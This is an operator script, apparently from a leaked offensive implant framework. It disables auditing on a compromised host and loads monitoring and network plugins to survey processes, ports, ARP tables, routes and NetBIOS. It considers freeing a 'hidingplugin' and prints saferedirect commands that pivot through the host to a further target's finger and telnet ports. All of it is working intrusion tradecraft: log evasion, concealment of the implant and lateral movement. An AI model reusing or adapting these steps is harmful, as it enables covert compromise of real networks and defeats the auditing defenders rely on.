##################################################### # Audit Section ##################################################### `script DisableAuditing.eps`; pause; ##################################################### # Monitors Section ##################################################### ifnot (`loadplugin monitoringplugin`) { echo "Failure loading monitor plugin. Exiting.."; return false; } `checkmouse`; `netstatmon`; `processmonitor`; `plugins`; `channels`; echo "If we are not doing a modify_audit or audit -off we can free the hiding plugin...."; if (prompt "Ok to free the plugin?"){ `freeplugin hidingplugin`; } pause; `processlist`; ##################################################### # Network Section ##################################################### ifnot (`loadplugin networkplugin`){ echo "Faliure loading network plugin. Exiting.."; return false; } `portmap`; `arp`; `netmap`; pause; `netbios -local`; `route`; echo "Ping the hammermill target and then set up the redirectors"; echo "For sampleman we need to use SAFEREDIRECT"; echo "saferedirect -tcp -lplisten 2221 -target (target IP) 79 -bind (our 10. address)"; echo "saferedirect -tcp -lplisten 2222 -target (target IP) 23 -bind (our 10. address)"; echo "saferedirect -tcp -lplisten 2223 -target (target IP) 23 -bind (our 10. address)";